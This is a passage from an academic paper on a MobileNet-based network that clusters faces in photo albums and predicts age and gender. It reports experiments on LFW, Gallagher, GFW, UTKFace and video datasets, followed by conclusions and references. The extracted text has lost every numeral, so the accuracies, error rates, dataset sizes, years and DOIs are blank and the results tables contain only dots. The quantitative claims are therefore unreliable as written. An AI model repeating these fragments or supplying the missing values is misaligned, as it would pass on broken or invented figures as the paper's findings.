result, % and % validation accuracies were obtained for age and gender, respectively. if the whole network including the backbone mobilenet is fine-tuned for one epoch using the sgd optimizer with learning rate e- , these accuracies are increased to % and %, but the quality of identity features suitable for face recognition obviously decreases. facial clustering in this subsection experimental study of the proposed system (fig. ) are provided in facial clustering task for images gathered in unconstrained environments. the identity features extracted by the base mobilenet (fig. ) are compared to the publicly available convnets suitable for face recognition, namely, the vggface (vggnet- ) (parkhi, vedaldi & zisserman, ) and the vggface (resnet- ) (cao et al., ). the vggface, vggface , and mobilenet extract d = , , d = , , and d = , non-negative features in the output of “fc ,” “pool _ x _s ,” and “reshape_ /mean” layers from � rgb images, respectively. all hierarchical clustering methods from scipy library are used with the euclidean (l ) distance between feature vectors. as the centroid and the ward’s linkage showed very poor performance in all cases, only results for single, average, complete, weighted, and median linkage methods are reported. in addition, the rank-order clustering (zhu, wen & sun, ) was implemented, which was specially developed for organizing faces in photo albums. the parameters of all clustering methods were tuned using % of each dataset. the following clustering metrics were estimated with the scikit-learn library: adjusted rand index, adjusted mutual information, homogeneity, and completeness. in addition, the average number of extracted clusters k relative to the number of subjects c and the bcubed f-measure are computed. the latter metric is widely applied in various tasks of grouping faces (he et al., ; zhang et al., b). in the experiments the following testing data were used. � subset of labeled faces in the wild (lfw) dataset (learned-miller et al., ), which was involved into the face identification protocol (best-rowden et al., ). c = subjects who have at least two images in the lfw database and at least one video in the youtube faces (ytf) database (subjects in ytf are a subset of those in lfw) are used in all clustering methods. � gallagher collection person dataset (gallagher & chen, ), which contains labeled faces with c = identities in each of the images. as only eyes positions are available in this dataset, i preliminarily detect faces using mtcnn (zhang et al., a) and chose the subject with the largest intersection of facial region with given eyes region. if the face is not detected, a square region with the size chosen as a . -times distance between eyes is extracted. � grouping faces in the wild (gfw) (he et al., ) with preliminarily detected facial images from real users’ albums from a chinese social network portal. the size of an album varies from to , faces, with a maximum number of identities of c = . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the average values of clustering performance metrics are presented in tables – for lfw, gallagher, and gfw datasets, respectively. the average linkage is the best method according to most of the metrics of cluster analysis. the usage of the rank-order distance (zhu, wen & sun, ) is not appropriate due to rather low performance. moreover, this distance requires an additional threshold parameter for the cluster-level rank-order distance. finally, the computational complexity of such clustering is three to four times higher when compared to other hierarchical agglomerative clustering methods. one of the most important conclusion here is that the trained mobilenet (fig. ) is in most cases more accurate than the widely used vggface. as expected, the quality of the proposed model is slightly lower when compared to the deep resnet- convnet trained on the same vggface dataset. surprisingly, the highest bcubed f-measure for the most complex gfw dataset ( . ) is achieved by the proposed model. this value is slightly higher than the best bcubed f-measure ( . ) reported in the original paper (he et al., ). however, the most important advantages of the proposed model from the practical point of view are excellent run-time/space complexity. for example, the inference in the proposed model is – -times faster when compared to the vggface and vggface . moreover, the dimensionality of the feature vector is two to four times lower leading to the faster computation of a distance matrix in a clustering method. in addition, the proposed model makes it possible to simultaneously predict age and gender of observed facial image. table clustering results, lfw subset (c = subjects). k/c ari ami homogeneity completeness f-measure single vggface . . . . . . vggface . . . . . . proposed model . . . . . . average vggface . . . . . . vggface . . . . . . proposed model . . . . . . complete vggface . . . . . . vggface . . . . . . proposed model . . . . . . weighted vggface . . . . . . vggface . . . . . . proposed model . . . . . . median vggface . . . . . . vggface . . . . . . proposed model . . . . . . rank-order vggface . . . . . . vggface . . . . . . proposed model . . . . . . note: the best results in each column are marked in bold. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table clustering results, gallagher dataset (c = subjects). k/c ari ami homogeneity completeness f-measure single vggface . . . . . . vggface . . . . . . proposed model . . . . . . average vggface . . . . . . vggface . . . . . . proposed model . . . . . . complete vggface . . . . . . vggface . . . . . . proposed model . . . . . . weighted vggface . . . . . . vggface . . . . . . proposed model . . . . . . median vggface . . . . . . vggface . . . . . . proposed model . . . . . . rank-order vggface . . . . . . vggface . . . . . . proposed model . . . . . . note: the best results in each column are marked in bold. table clustering results, gfw dataset (in average, c = subjects). k/c ari ami homogeneity completeness f-measure single vggface . . . . . . vggface . . . . . . proposed model . . . . . . average vggface . . . . . . vggface . . . . . . proposed model . . . . . . complete vggface . . . . . . vggface . . . . . . proposed model . . . . . . weighted vggface . . . . . . vggface . . . . . . proposed model . . . . . . median vggface . . . . . . vggface . . . . . . proposed model . . . . . . rank-order vggface . . . . . . vggface . . . . . . proposed model . . . . . . note: the best results in each column are marked in bold. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ though the main purpose of this paper is face grouping in unsupervised environment, it is important to analyze the quality of face identification of the proposed model. thus, in the last experiment of this subsection i deal with the lfw dataset (learned- miller et al., ) and pubfig dataset (pinto et al., ). i took , photos of , persons from lfw with more than one photo. all , photos of c = identities from pubfig were considered. the datasets are divided randomly times into the training and testing sets, so that the ratio of the size r of the training set to the size of the whole dataset is equal to a fixed number. the rank- accuracy of the k-nn classifier for the proposed model in comparison with the state-of-the-art results for – train/test split of the lfw is shown in table . the results of the -times repeated random sub-sampling cross validation of the k-nn classifier (savchenko, ) for several publicly available convnets in dependence of the number of photos of each subject are presented in table . here the model size of each convnet and average inference time on cpu of macbook pro ( gb ram, intel core i . ghz) are additionally presented. here one could notice that the proposed simple network provides competitive results with the state-of-the-art solutions though its size is approximately . -times lower than the table rank- accuracy (%) in face identification for lfw dataset. convnet rank- accuracy cots-s +s (best-rowden et al., ) . deepface (taigman et al., ) . vggface (vggnet- ) (parkhi, vedaldi & zisserman, ) . arcface (deng et al., ) . viplfacenetfull (liu et al., a) . light cnn (c) (wu et al., ) . deepid + (sun et al., ) . deepid (sun et al., ) . idl ensemble (liu et al., ) . facenet (inceptionresnet+softmax loss) (schroff, kalenichenko & philbin, ) . vggface (resnet- ) (cao et al., ) . proposed model . table results of face identification for pubfig dataset. convnet rank- accuracy (%) model size (mb) inference time (ms) number of photos per subject light cnn (c) . ± . . ± . . ± . . . vggface (vggnet- ) . ± . . ± . . ± . . . vggface (resnet- ) . ± . . ± . . ± . . . proposed model . ± . . ± . . ± . . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ size of the deep resnet- trained on vggface dataset (cao et al., ). the inference time in the mobilenet is also known to be much lower. age and gender recognition in this subsection, the proposed model is compared with publicly available convnets for age/gender prediction: � deep expectation (dex) vgg network trained on the imdb-wiki dataset (rothe, timofte & van gool, ) � wide resnet (zagoruyko & komodakis, ) (weights. - . ) (https://github.com/ yu u/age-gender-estimation) � wide resnet (weights. - . ) (https://github.com/tony /keras_age_gender) � facenet (schroff, kalenichenko & philbin, ) (https://github.com/boyuanjiang/age- gender-estimate-tf) � bknetstyle (https://github.com/truongnmt/multi-task-learning) � ssrnet (yang et al., ) (https://github.com/shamangary/ssr-net) � mobilenet v (agegendernet) (https://github.com/dandynaufaldi/agendernet) � two models from insightface (deng et al., ): original resnet- and “new” fast convnet (https://github.com/deepinsight/insightface/) � inception v (https://github.com/dpressel/rude-carnie) fine-tuned on the adience dataset (eidinger, enbar & hassner, ) � age_net/gender_net (levi & hassner, ) trained on the adience dataset (eidinger, enbar & hassner, ). in contrast to the proposed approach, all these models have been trained only on specific datasets with age and gender labels, that is, they are fine-tuned from traditional convnets pre-trained on imagenet- and do not use large-scale face recognition datasets. in addition, several special cases of the mobilenet-based model (fig. ) were examined. firstly, i compressed this model using standard tensorflow quantization graph transforms. secondly, all layers of the proposed model were fine-tuned for age and gender predictions (hereinafter “proposed mobilenet, fine-tuned”). though such tuning obviously reduce the accuracy of face identification with identity features at the output of the base mobilenet, it caused an above-mentioned increase of validation accuracies for gender and age classification thirdly, in order to compare the proposed multi-output neural network (fig. ) with conventional approach, i additionally used the same mobilenet-based network but with a single head, which was pre-trained on the same vggface face recognition problem and then fine-tuned for one task (age or gender recognition), that is, there are two different models (hereinafter “mobilenet with single head”) for all these tasks. finally, it was decided to measure the influence of pre-training on face recognition task. hence, the model (fig. ) was fine-tuned using the above- mentioned procedure and the same training set with labeled age and gender, but the base savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/yu u/age-gender-estimation https://github.com/yu u/age-gender-estimation https://github.com/tony /keras_age_gender https://github.com/boyuanjiang/age-gender-estimate-tf https://github.com/boyuanjiang/age-gender-estimate-tf https://github.com/truongnmt/multi-task-learning https://github.com/shamangary/ssr-net https://github.com/dandynaufaldi/agendernet https://github.com/deepinsight/insightface/ https://github.com/dpressel/rude-carnie http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mobilenet was pre-trained on conventional imagenet- dataset rather than on vggface (cao et al., ). though such network (hereinafter “proposed mobilenet, fine-tuned from imagenet”) cannot be used in facial clustering, it can be applied in gender and age prediction tasks. i run the experiments on the msi gp re laptop (cpu: xintel core i . ghz, ram: gb, gpu: nvidia geforce gtx ) and two mobile phones, namely: ( ) honor c pro (cpu: mt � ghz and � . ghz, ram: gb); and ( ) samsung s + (cpu: � . ghz mongoose m and � . ghz cortex-a , ram: gb). the size of the model file and average inference time for one facial image are presented in table . as expected, the mobilenets are several times faster than the deeper convolutional networks and require less memory to store their weights. though the quantization reduces the model size in four times, it does not decrease the inference time. finally, though the computing time for the laptop is significantly lower when compared to the inference on mobile phones, their modern models (“mobile phone ”) became all the more suitable for offline image recognition. in fact, the proposed model requires only – ms to extract facial identity features and predict both age and gender, which makes it possible to run complex analytics of facial albums on device. in the next experiments the accuracy of the proposed models were estimated in gender recognition and age prediction tasks. at first, i deal with university of tennessee, knoxville face dataset (utkface) (zhang, song & qi, ). the images from complete (“in the wild”) set were pre-processed using the following procedure from the above-mentioned agegendernet resource (https://github.com/dandynaufaldi/ agendernet): faces are detected and aligned with margin . using get_face_chip function from dlib. next, all images which has no single face detected, are removed. the rest , images are scaled to the same size � . in order to estimate the accuracy of age prediction, eight age ranges from the adience dataset (eidinger, enbar & hassner, ) were used. if the predicted and real age are included into the same range, then the recognition is assumed to be correct. the results are shown in table . in contrast to the previous experiment (table ), here the inference time is measured on the laptop’s gpu. in this experiment the proposed convnets (three last lines in table ) have higher accuracy of age/gender recognition when compared to the available models trained only on specific datasets, for example, imdb-wiki or adience. for example, the best fine-tuned mobilenet provided . – % higher accuracy of gender classification. the gain in age prediction performance is even more noticeable: i obtain . – years less mae (mean table performance analysis of convnets. convnet model size (mb) average cpu inference time (ms) laptop mobile phone mobile phone age_net/gender_net . , dex . , proposed mobilenet . proposed mobilenet, quantized . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dandynaufaldi/agendernet https://github.com/dandynaufaldi/agendernet http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ absolute error) and – % higher accuracy. though the gender recognition accuracy of a convnet with single head is rather high, multi-task learning causes a noticeable decrease in age prediction quality (up to . % and . % differences in mae accuracy). hence, the proposed approach is definitely more preferable if both age and gender recognition tasks are solved due to the twice-lower running time when compared to the usage of separate age and gender networks. it is interesting that though there exist models with lower size, for example, ssrnet (yang et al., ) or new insightface-based model (deng et al., ), the proposed convnet provides the fastest inference, which can be explained by special optimization of hardware for such widely used architectures as mobilenet. it is known that various image preprocessing algorithms could drastically influence the recognition performance. hence, in the next experiment conventional set of all , images from “aligned & cropped faces” provided by the authors of the utkface was used. the results of the same models are presented in table . the difference in image pre-processing causes significant decrease of the accuracies of most models. for example, the best proposed model in this experiment has – % and – % higher age and gender recognition accuracy, respectively. its age prediction mae is at least . years lower when compared to the best publicly available model from insight face. the usage of the same dlib library to detect and align faces in a way, which is only slightly different from the above-mentioned preprocessing pipeline, drastically decreases the accuracy of the best existing model from previous experiment (mobilenet v ) up to . % gender accuracy and years in age prediction mae. obviously, such dependence of performance on the image pre-processing algorithm makes the model inappropriate for practical applications. hence, this experiment clearly demonstrates how table age and gender recognition results for preprocessed utkface (in the wild) dataset. models gender accuracy (%) age mae age accuracy (%) model size (mb) inference time (ms) dex . . . , . . wide resnet (weights. - . ) . . . . . wide resnet (weights. - . ) . . . . . facenet . . . . . bknetstyle . . . . . ssrnet . . . . . mobilenet v (agegendernet) . . . . . resnet- from insightface . . . . . “new” model from insightface . . . . . inception trained on adience . – . . . age_net/gender_net . – . . . mobilenets with single head . . . . . proposed mobilenet, fine-tuned from imagenet . . . . . proposed mobilenet, pre-trained on vggface . . . . . proposed mobilenet, fine-tuned . . . . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed model exploits the potential of very large face recognition dataset to learn face representation in contrast to the training only on rather small and dirty datasets with age and gender labels. it is important to emphasize that the same statement is valid even for the proposed model (fig. ). in particular, the usage of face identification features pre-trained on vggface leads to . % and . % lower error rate of age and gender classification, respectively, when compared to conventional fine-tuning of mobilenet, which has been preliminarily trained on imagenet- only (third last line in table ). this difference in error rates is much more noticeable when compared to the previous experiment (table ), especially for age prediction mae. many recent papers devoted to utkface dataset split it into the training and testing sets and fine-tune the models on such training set (das, dantcheva & bremond, ). though the proposed convnet does not require such fine-tuning, its results are still very competitive. for example, i used the testing set described in the paper (cao, mirjalili & raschka, ), which achieves the-state-of-the-art results on a subset of utkface if only , photos of persons from the age ranges are taken into the testing set. the proposed model achieves . % gender recognition accuracy and age prediction mae . . it is lower than . mae of the best coral-cnn model from this paper, which was additionally trained on other subset of utkface. as the age and gender recognition is performed in the proposed pipeline (fig. ) for a set of facial images in a cluster, it was decided to use the known video datasets with age/gender labels in the next experiments in order to test performance of classification of a set of video frames (kharchevnikova & savchenko, ): � eurecom kinect (min, kose & dugelay, ), which contains nine photos for each of subjects ( women and men). table age and gender recognition results for utkface (aligned and cropped faces) dataset. models gender accuracy (%) age mae age accuracy (%) dex . . . wide resnet (weights. - . ) . . . wide resnet (weights. - . ) . . . facenet . . . bknetstyle . . . ssrnet . . . mobilenet v (agegendernet) . . . resnet- from insightface . . . “new” model from insightface . . . inception trained on adience . – . age_net/gender_net . – . mobilenets with single head . . . proposed mobilenet, fine-tuned from imagenet . . . proposed mobilenet, pre-trained on vggface . . . proposed mobilenet, fine-tuned . . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � indian movie face database (imfdb) (setty et al., ) with video clips of males and females. only four age categories are available: “child” ( – years old), “young” ( – ), “middle”: ( – ), and “old” ( +). � acted facial expressions in the wild (afew) from the emotiw (emotions recognition in the wild) audio–video emotional sub-challenge (klare et al., ). it contains , video files. the facial regions were detected using the mtcnn (zhang et al., a). � iarpa janus benchmark a (dhall et al., ) with more than , total frames of , video tracks. only gender information is available in this dataset. in video-based gender recognition a gender of a person on each video frame is firstly classified. after that two simple fusion strategies are utilized, namely, simple voting, and the product rule ( ). the obtained accuracies of the proposed models compared to most widely used dex (rothe, timofte & van gool, ) and gender_net/age_net (levi & hassner, ) are shown in table . here again the proposed models are much more accurate than the publicly available convnets trained only on rather small and dirty datasets with age/gender labels. it is important to emphasize that the gender output of the proposed network was trained on the same imdb-wiki dataset as the dex network (rothe, timofte & van gool, ). however, the error rate in the proposed approach is much lower when compared to the dex. it can be explained by the pre-training of the base mobilenet on face identification task with very large dataset, which helps to learn rather good facial representations. such pre-training differs from traditional usage of imagenet weights and only fine-tune the cnn on a specific dataset with known age and gender labels. secondly, the usage of product rule generally leads to – % decrease of the error rate when compared to the simple voting. thirdly, the fine-tuned version of the proposed model achieves the lowest error rate only for the kinect dataset and is – % less accurate in other cases. it is worth noting that the best accuracy for eurecom kinect dataset is % higher than the best-known accuracy ( . %) achieved by huynh, min & dugelay ( ) in similar settings without analysis of depth images. fourthly, though the compression of the convnet makes it possible to drastically reduce the model size (table ), it is characterized by up to % decrease of the recognition rate. finally, conventional single-output model is slightly less accurate than the proposed network, though the difference in the error rate is not statistically significant. in the last experiment the results for age predictions are presented (table ). as the training set for the proposed network differs with conventional dex model due to addition of the adience data to the imdb-wiki dataset, it was decided to repeat training of the proposed network (fig. ) with the imdb-wiki data only. hence, the resulted “proposed mobilenet, imdb-wiki only” convnet is more fairly compared with the dex network. here it was assumed that age is recognized correctly for the kinect and afew datasets (with known age) if the difference between real and predicted age is not greater than years. the fusion of age predictions of individual video frames is implemented savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table video-based age prediction accuracy, %. convnet aggregation eurecom kinect imfdb afew age_net simple voting product rule expected value dex simple voting product rule expected value mobilenet with single head simple voting product rule expected value proposed mobilenet, imdb-wiki only simple voting product rule expected value proposed mobilenet, imdb-wiki+adience simple voting product rule expected value proposed mobilenet, quantized simple voting product rule expected value proposed mobilenet, fine-tuned simple voting product rule expected value note: the highest accuracies for each dataset are marked by bold. table video-based gender recognition accuracy, %. convnet aggregation eurecom kinect imfdb afew ijb-a gender_net simple voting product rule dex simple voting product rule mobilenet with single head simple voting product rule proposed mobilenet simple voting product rule proposed mobilenet, quantized simple voting product rule proposed mobilenet, fine-tuned simple voting product rule note: the highest accuracies for each dataset are marked by bold. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by: ( ) simple voting, ( ) maximizing the product of age posterior probabilities ( ), and ( ) averaging the expected value ( ) with choice of l = top predictions in each frame. one can notice that the proposed models are again the most accurate in practically all cases. the accuracy of the dex models are comparable with the proposed convnets only for the afew dataset. this gain in the error rate cannot be explained by using additional adience data, as it is noticed even for the “proposed mobilenet, imdb-wiki only” model. secondly, the lowest error rates are obtained for the computation of the expected value of age predictions. for example, it is % and % more accurate than the simple voting for the kinect and afew data. the effect is especially clear for the imfdb images, in which the expected value leads to up to % higher recognition rate. conclusions in this paper i proposed an approach to organizing photo and video albums (fig. ) based on a simple extension of mobilenet (fig. ), in which the facial representations suitable for face identification, age, and gender recognition problems are extracted. the main advantage of the proposed model is the possibility to solve all three tasks simultaneously without need for additional convnets. as a result, a very fast facial analytic system was implemented (table ), which can be installed even on mobile devices (fig. ). it was shown that the proposed approach extracts facial clusters rather accurately when compared to the known models (tables and ). moreover, the known state-of-the-art bcubed f-measure for very complex gfw data was slightly improved (table ). more importantly, the results for age and gender predictions using extracted facial representations significantly outperform the results of the publicly available neural networks (tables and ). the state-of-the-art results on the whole utkface dataset (zhang, song & qi, ) was achieved ( . % gender recognition accuracy, . age prediction mae) for the convnets which are not fine-tuned on a part of this dataset. the proposed approach does not have the limitations of existing methods of simultaneous face analysis (ranjan, patel & chellappa, ; yoo et al., ) for usage in face identification and clustering tasks because it firstly learns the facial representations using external very large face recognition dataset. the proposed approach is usable even for face identification with small training samples, including the most complex case, namely, a single photo per individual. furthermore, the method enables to apply the convnet in completely unsupervised environments for face clustering, given only a set of photos from a mobile device. finally, the training procedure to learn parameters of the method alternately trains all the facial attribute recognition tasks using batches of different training images. hence, the training images are not required to have all attributes available. as a result, much more complex (but still fast) network architectures can be trained when compared to the convnet of (yoo et al., ) and, hence, achieve very high age/gender recognition accuracy and the face clustering quality comparable to very deep state-of-the-art convnets. in future works it is necessary to deal with the aging problem. in fact, the average linkage clustering usually produces several groups for the same person (especially, a child). savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the single linkage clustering can resolve this issue if there are photos of the same subject made over the years. unfortunately, the performance of the single linkage is rather poor when compared to another agglomerative clustering methods (tables – ). an additional research direction is a thorough analysis of distance measures in the facial clustering (zhu, wen & sun, ); that is, the usage of distance learning (zhu et al., ) or special regularizers (savchenko & belova, ). it is also important to extend the proposed approach to classify other facial attributes, for example, race/ethnicity (zhang, song & qi, ) or emotions (rassadin, gruzdev & savchenko, ). finally, though the main purpose of this paper was to provide an efficient convnet suitable for multiple tasks including extraction of good face representations, the quality of grouping faces could be obviously improved by replacement of agglomerative clustering to contemporary clustering techniques with unknown number of clusters (he et al., ; zhang et al., b; shi, otto & jain, ; vascon et al., ). additional information and declarations funding this research was supported by samsung research and samsung electronics. additionally, this research was prepared within the framework of the basic research program at the national research university higher school of economics (hse) in return for lab time. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: samsung research and samsung electronics. basic research program at the national research university higher school of economics. competing interests andrey v. savchenko is an employee of the samsung-pdmi joint ai center, st. petersburg department of steklov institute of mathematics russian academy of sciences and of the national research university higher school of economics. author contributions � andrey v. savchenko conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: source code and neural network models are publicly available at github: https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references aggarwal cc, reddy ck. . data clustering: algorithms and applications. boca raton: crc press. antipov g, baccouche m, berrani s-a, dugelay j-l. . effective training of convolutional neural networks for face-based gender and age prediction. pattern recognition : – doi . /j.patcog. . . . best-rowden l, han h, otto c, klare bf, jain ak. . unconstrained face recognition: identifying a person of interest from a media collection. ieee transactions on information forensics and security ( ): – doi . /tifs. . . cao w, mirjalili v, raschka s. . consistent rank logits for ordinal regression with convolutional neural networks. arxiv available at http://arxiv.org/abs/ . . cao q, shen l, xie w, parkhi om, zisserman a. . vggface : a dataset for recognising faces across pose and age. in: proceedings of the international conference on automatic face & gesture recognition (fg ). piscataway: ieee, – . choi se, lee yj, lee sj, park kr, kim j. . age estimation using a hierarchical classifier based on global and local facial features. pattern recognition ( ): – doi . /j.patcog. . . . crosswhite n, byrne j, stauffer c, parkhi o, cao q, zisserman a. . template adaptation for face verification and identification. in: proceedings of the international conference on automatic face & gesture recognition (fg ). piscataway: ieee, – . das a, dantcheva a, bremond f. . mitigating bias in gender, age and ethnicity classification: a multi-task convolution neural network approach. in: european conference on computer vision. munich: springer, – . deng j, guo j, niannan x, zafeiriou s. . arcface: additive angular margin loss for deep face recognition. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. dhall a, goecke r, lucey s, gedeon t. . collecting large, richly annotated facial-expression databases from movies. ieee multimedia ( ): – doi . /mmul. . . eidinger e, enbar r, hassner t. . age and gender estimation of unfiltered faces. ieee transactions on information forensics and security ( ): – doi . /tifs. . . gallagher ac, chen t. . clothing cosegmentation for recognizing people. in: proceedings of the international conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . goodfellow i, bengio y, courville a. . deep learning. cambridge, london: mit press. guo y, zhang l. . one-shot face recognition by promoting underrepresented classes. available at http://arxiv.org/abs/ . . han h, jain ak, wang f, shan s, chen x. . heterogeneous face attribute estimation: a deep multi-task learning approach. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . he y, cao k, li c, loy cc. . merge or not? learning to group faces via imitation learning. available at http://arxiv.org/abs/ . . howard ag, zhu m, chen b, kalenichenko d, wang w, weyand t, andreetto m, adam h. . mobilenets: efficient convolutional neural networks for mobile vision applications. available at http://arxiv.org/abs/ . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tifs. . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /mmul. . http://dx.doi.org/ . /tifs. . http://arxiv.org/abs/ . http://dx.doi.org/ . /tpami. . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ huynh t, min r, dugelay j-l. . an efficient lbp-based descriptor for facial depth images applied to gender recognition using rgb-d face data. in: asian conference on computer vision. daejeon: springer, – . kaya h, gürpnar f, salah aa. . video-based emotion recognition in the wild using deep transfer learning and score fusion. image and vision computing : – doi . /j.imavis. . . . kharchevnikova as, savchenko av. . the video-based age and gender recognition with convolution neural networks. in: international conference on network analysis. nizhny novgorod: springer, – . kharchevnikova as, savchenko av. . neural networks in video-based age and gender recognition on mobile platforms. optical memory and neural networks ( ): – doi . /s x . kittler j, hatef m, duin rp, matas j. . on combining classifiers. ieee transactions on pattern analysis and machine intelligence ( ): – . klare bf, klein b, taborsky e, blanton a, cheney j, allen k, grother p, mah a, jain ak. . pushing the frontiers of unconstrained face detection and recognition: iarpa janus benchmark a. in: proceedings of the international conference on computer vision and pattern recognition (cvpr). boston: ieee, – . learned-miller e, huang gb, roychowdhury a, li h, hua g. . labeled faces in the wild: a survey. in: kawulok m, celebi m, smolka b, eds. advances in face detection and facial image analysis. cham: springer, – doi . / - - - - . levi g, hassner t. . age and gender classification using convolutional neural networks. in: proceedings of the ieee conference on computer vision and pattern recognition workshops (cvprw). piscataway: ieee, – . liu j, deng y, bai t, wei z, huang c. . targeting ultimate accuracy: face recognition via deep embedding. arxiv available at http://arxiv.org/abs/ . . liu x, kan m, wu w, shan s, chen x. a. viplfacenet: an open source deep face recognition sdk. frontiers of computer science ( ): – doi . /s - - - . liu w, wen y, yu z, li m, raj b, song l. b. sphereface: deep hypersphere embedding for face recognition. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr). vol. . piscataway: ieee. manju a, valarmathie p. . organizing multimedia big data using semantic based video content extraction technique. in: proceedings of the international conference on soft-computing and networks security (icsns). coimbatore: ieee, – . min r, kose n, dugelay j-l. . kinectfacedb: a kinect database for face recognition. ieee transactions on systems, man, and cybernetics: systems ( ): – doi . /tsmc. . . parkhi om, vedaldi a, zisserman a. . deep face recognition. in: proceedings of the british conference on machine vision (bmvc), swansea, uk, vol. . . pinto n, stone z, zickler t, cox d. . scaling up biologically-inspired computer vision: a case study in unconstrained face recognition on facebook. in: proceedings of cvprw. piscataway: ieee, – . ranjan r, patel vm, chellappa r. . hyperface: a deep multi-task learning framework for face detection, landmark localization, pose estimation, and gender recognition. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.imavis. . . http://dx.doi.org/ . /s x http://dx.doi.org/ . / - - - - http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rassadin a, gruzdev a, savchenko a. . group-level emotion recognition using transfer learning from face identification. in: proceedings of the th acm international conference on multimodal interaction (icmi). new york: acm, – . rothe r, timofte r, van gool l. . dex: deep expectation of apparent age from a single image. in: proceedings of the ieee international conference on computer vision workshops (cvprw). piscataway: ieee, – . savchenko av. . search techniques in intelligent classification systems. basel: springer. savchenko a. . efficient statistical face recognition using trigonometric series and cnn features. in: th international conference on pattern recognition (icpr). piscataway: ieee, – . savchenko av. . sequential three-way decisions in multi-category image recognition with deep features based on distance factor. information sciences : – doi . /j.ins. . . . savchenko av, belova ns. . unconstrained face identification using maximum likelihood of distances between deep off-the-shelf features. expert systems with applications : – doi . /j.eswa. . . . schroff f, kalenichenko d, philbin j. . facenet: a unified embedding for face recognition and clustering. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr), boston, massachusetts, usa, – . setty s, husain m, beham p, gudavalli j, kandasamy m, vaddi r, hemadri v, karure j, raju r, rajan b, kumar v, jawahar c. . indian movie face database: a benchmark for face recognition under wide variations. in: proceedings of the fourth national conference on computer vision, pattern recognition, image processing and graphics (ncvpripg). piscataway: ieee, – . sharif razavian a, azizpour h, sullivan j, carlsson s. . cnn features off-the-shelf: an astounding baseline for recognition. in: proceedings of conference on computer vision and pattern recognition workshops (cvprw). piscataway: ieee computer society, – . shi y, otto c, jain ak. . face clustering: representation and pairwise constraints. ieee transactions on information forensics and security ( ): – doi . /tifs. . . sokolova ad, kharchevnikova as, savchenko av. . organizing multimedia data in video surveillance systems based on face verification with convolutional neural networks. in: proceedings of the international conference on analysis of images, social networks and texts. moscow: springer, – . sun y, chen y, wang x, tang x. . deep learning face representation by joint identification- verification. in: advances in neural information processing systems, montreal, canada, – . sun y, liang d, wang x, tang x. . deepid : face recognition with very deep neural networks. arxiv available at http://arxiv.org/abs/ . . taigman y, yang m, ranzato m, wolf l. . deepface: closing the gap to human-level performance in face verification. in: proceedings of the conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . vascon s, cristani m, pelillo m, murino v. . using dominant sets for k-nn prototype selection. in: international conference on image analysis and processing. naples: springer, – . wang f, cheng j, liu w, liu h. . additive margin softmax for face verification. ieee signal processing letters ( ): – doi . /lsp. . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tifs. . http://arxiv.org/abs/ . http://dx.doi.org/ . /lsp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wen y, zhang k, li z, qiao y. . a discriminative feature learning approach for deep face recognition. in: european conference on computer vision. amsterdam: springer, – . wu x, he r, sun z, tan t. . a light cnn for deep face representation with noisy labels. ieee transactions on information forensics and security ( ): – doi . /tifs. . . yang t-y, huang y-h, lin y-y, hsiu p-c, chuang y-y. . ssr-net: a compact soft stagewise regression network for age estimation. in: proceedings of the international joint conference on artificial intelligence (ijcai), stockholm, sweden, – . yoo b, namjoon k, changkyo l, choi ck, jaejoon h. . method and apparatus for recognizing object, and method and apparatus for training recognizer. us patent , , . available at https://patents.google.com/patent/ep a . zagoruyko s, komodakis n. . wide residual networks. arxiv available at http://arxiv. org/abs/ . . zhang yj, lu h. . a hierarchical organization scheme for video data. 